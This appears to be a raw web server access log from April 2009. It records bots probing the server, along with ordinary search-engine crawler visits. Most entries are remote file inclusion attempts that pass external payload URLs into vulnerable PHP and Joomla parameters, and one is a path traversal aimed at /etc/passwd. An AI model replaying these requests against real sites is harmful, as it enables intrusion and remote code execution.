89.188.110.43 - - [09/Apr/2009:09:13:56 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.imprex.co.kr/bbs//skin/happycast_blue/tek.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.825"
82.149.231.93 - - [09/Apr/2009:09:14:50 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
82.149.231.93 - - [09/Apr/2009:09:14:50 -0500] "GET /environment.php?DIR_PREFIX=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
82.119.205.130 - - [09/Apr/2009:09:18:32 -0500] "GET /errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:09:18:32 -0500] "GET /logs/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:09:18:33 -0500] "GET /logs/access_log.1233360000/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:09:21:12 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:09:21:12 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:09:21:12 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:09:21:25 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 334 "-""Mozilla/5.0"
81.91.84.17 - - [09/Apr/2009:09:23:49 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.91.84.17 - - [09/Apr/2009:09:23:50 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.91.84.17 - - [09/Apr/2009:09:23:50 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ppclub.co.kr/bbs/11.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.155.232.37 - - [09/Apr/2009:09:25:39 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
195.155.232.37 - - [09/Apr/2009:09:25:39 -0500] "GET //appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
209.25.134.211 - - [09/Apr/2009:09:26:58 -0500] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://heintzelmanfh.com/rid.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
209.25.134.211 - - [09/Apr/2009:09:26:58 -0500] "GET /modules/vwar/admin/admin.php?vwar_root=http://heintzelmanfh.com/rid.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
83.16.182.130 - - [09/Apr/2009:09:27:12 -0500] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
83.16.182.130 - - [09/Apr/2009:09:27:12 -0500] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.esoterikha.com/scgi-bin/boletim/header.jpg? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
65.55.208.135 - - [09/Apr/2009:09:31:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [09/Apr/2009:09:31:02 -0500] "GET /logs/access_log.1223424000 HTTP/1.1" 200 61036 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:09:33:35 -0500] "GET /logs/access_log.1191456000 HTTP/1.1" 200 1209 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.7.216.240 - - [09/Apr/2009:09:33:42 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:09:33:42 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:09:33:43 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:09:34:55 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:09:34:55 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:09:34:55 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:09:38:01 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:09:38:01 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:09:38:01 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
88.80.197.27 - - [09/Apr/2009:09:39:53 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
88.80.197.27 - - [09/Apr/2009:09:39:53 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
88.80.197.27 - - [09/Apr/2009:09:39:53 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
88.80.197.27 - - [09/Apr/2009:09:39:53 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
66.90.118.42 - - [09/Apr/2009:09:40:54 -0500] "GET /logs/index.php?visualizar=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.810"
66.90.118.42 - - [09/Apr/2009:09:40:54 -0500] "GET /index.php?visualizar=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.810"
88.80.197.27 - - [09/Apr/2009:09:41:19 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
65.55.208.138 - - [09/Apr/2009:09:49:25 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [09/Apr/2009:09:49:25 -0500] "GET /logs/access_log HTTP/1.1" 200 0 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.189.9.11 - - [09/Apr/2009:09:50:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
213.189.9.11 - - [09/Apr/2009:09:50:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
89.187.131.186 - - [09/Apr/2009:09:51:02 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:09:51:02 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:09:51:02 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:09:52:13 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:09:52:13 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:09:52:13 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.71.203 - - [09/Apr/2009:10:13:47 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.203 - - [09/Apr/2009:10:13:47 -0500] "GET /logs/access_log.1109289600 HTTP/1.1" 200 3081 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.202.116.18 - - [09/Apr/2009:10:14:27 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.202.116.18 - - [09/Apr/2009:10:14:27 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.202.116.18 - - [09/Apr/2009:10:14:27 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
216.17.106.121 - - [09/Apr/2009:10:15:18 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
216.17.106.121 - - [09/Apr/2009:10:15:18 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
72.3.131.107 - - [09/Apr/2009:10:15:20 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.3.131.107 - - [09/Apr/2009:10:15:20 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.3.131.107 - - [09/Apr/2009:10:15:20 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.106.210.58 - - [09/Apr/2009:10:27:43 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:10:27:43 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:10:27:43 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.141.48.47 - - [09/Apr/2009:10:29:26 -0500] "GET //listener_graph.php//common/db.php?commonpath=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
62.141.48.47 - - [09/Apr/2009:10:29:26 -0500] "GET /logs//listener_graph.php//common/db.php?commonpath=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.141.48.47 - - [09/Apr/2009:10:29:26 -0500] "GET /logs/access_log.1236297600//listener_graph.php//common/db.php?commonpath=http://southsiderotary.com/fx29id.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:10:35:15 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:10:35:15 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:10:35:15 -0500] "GET /logs/access_log.1236729600/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:10:35:15 -0500] "GET /logs/access_log.1236643200/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.36.194.156 - - [09/Apr/2009:10:38:54 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.822"
174.36.194.156 - - [09/Apr/2009:10:38:55 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.822"
195.34.78.110 - - [09/Apr/2009:10:42:03 -0500] "GET /logs/access_log.1236902400/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [09/Apr/2009:10:42:03 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.34.78.110 - - [09/Apr/2009:10:42:03 -0500] "GET /logs/access_log.1236988800/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [09/Apr/2009:10:42:04 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.1.149.222 - - [09/Apr/2009:10:42:59 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
124.1.149.222 - - [09/Apr/2009:10:43:00 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
195.34.78.110 - - [09/Apr/2009:10:45:01 -0500] "GET /logs/access_log.1236729600/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [09/Apr/2009:10:45:01 -0500] "GET /logs/access_log.1236643200/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.22.204.193 - - [09/Apr/2009:10:45:42 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.76"
203.22.204.193 - - [09/Apr/2009:10:45:42 -0500] "GET /spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
203.22.204.193 - - [09/Apr/2009:10:45:42 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.76"
203.22.204.193 - - [09/Apr/2009:10:45:42 -0500] "GET /spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.76"
218.27.203.107 - - [09/Apr/2009:10:52:20 -0500] "GET /errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [09/Apr/2009:10:52:21 -0500] "GET /logs/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [09/Apr/2009:10:52:21 -0500] "GET /logs/access_log.1237852800/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.106.121 - - [09/Apr/2009:10:52:56 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
216.17.106.121 - - [09/Apr/2009:10:52:56 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
218.27.203.107 - - [09/Apr/2009:10:53:23 -0500] "GET /logs/access_log.1237852800/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [09/Apr/2009:10:53:24 -0500] "GET /errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [09/Apr/2009:10:53:24 -0500] "GET /logs/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.1.215.162 - - [09/Apr/2009:10:55:44 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.1.215.162 - - [09/Apr/2009:10:56:31 -0500] "GET /logs/access_log.1234483200 HTTP/1.0" 200 148921 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.27.203.107 - - [09/Apr/2009:10:57:12 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [09/Apr/2009:10:57:47 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.1.149.222 - - [09/Apr/2009:10:58:12 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
124.1.149.222 - - [09/Apr/2009:10:58:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
64.202.116.18 - - [09/Apr/2009:10:58:47 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.202.116.18 - - [09/Apr/2009:10:58:47 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.202.116.18 - - [09/Apr/2009:10:58:47 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.202.116.18 - - [09/Apr/2009:10:58:55 -0500] "GET /logs/access_log.1237334400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.1.215.162 - - [09/Apr/2009:10:59:32 -0500] "GET /logs/access_log.1164931200 HTTP/1.0" 200 2951 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.3.131.107 - - [09/Apr/2009:11:00:44 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.3.131.107 - - [09/Apr/2009:11:00:44 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.3.131.107 - - [09/Apr/2009:11:00:44 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.3.131.107 - - [09/Apr/2009:11:00:47 -0500] "GET /logs/access_log.1237334400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ccm.pl/ccm/tukulid.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
89.108.73.84 - - [09/Apr/2009:11:02:22 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.108.73.84 - - [09/Apr/2009:11:02:23 -0500] "GET /spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
89.108.73.84 - - [09/Apr/2009:11:02:23 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.108.73.84 - - [09/Apr/2009:11:02:23 -0500] "GET /spaw_control.class.php?spaw_root=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
66.249.71.203 - - [09/Apr/2009:11:09:21 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 200 3637 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.62.4.50 - - [09/Apr/2009:11:12:12 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.62.4.50 - - [09/Apr/2009:11:12:12 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.62.4.50 - - [09/Apr/2009:11:12:12 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
209.62.4.50 - - [09/Apr/2009:11:23:30 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.62.4.50 - - [09/Apr/2009:11:23:30 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.62.4.50 - - [09/Apr/2009:11:23:30 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:11:26:15 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nittanypages.com/.ftpuser/fx29id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:11:26:15 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nittanypages.com/.ftpuser/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:11:26:15 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nittanypages.com/.ftpuser/fx29id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:11:26:15 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://nittanypages.com/.ftpuser/fx29id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.133 - - [09/Apr/2009:11:46:10 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [09/Apr/2009:11:46:11 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 200 3258 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [09/Apr/2009:11:46:13 -0500] "GET /logs/access_log.1120262400 HTTP/1.1" 200 2827 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
